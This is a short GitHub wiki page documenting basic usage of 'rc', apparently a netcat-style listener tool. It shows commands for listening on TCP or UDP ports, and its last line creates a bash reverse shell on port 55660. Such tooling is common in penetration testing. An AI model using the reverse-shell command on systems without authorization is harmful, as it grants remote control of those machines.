-
Notifications
You must be signed in to change notification settings - Fork 65
Basic Usage
Robiot edited this page Aug 6, 2021
·
10 revisions
rc [options] [destination] [port]
Show the help
rc --help
Listen to port 55660 on localhost
rc -lp 55660
Listen to port 55660 on localhost with command history :
rc -lpH 55660
Listen to port 55660 on localhost udp :
rc -lpu 55660
Listen to port 55660 on specified ip (192.168.1.10) :
rc -l 192.168.1.10 55660
Create a bash reverse shell on port 55660:
rc -rp 55660 bash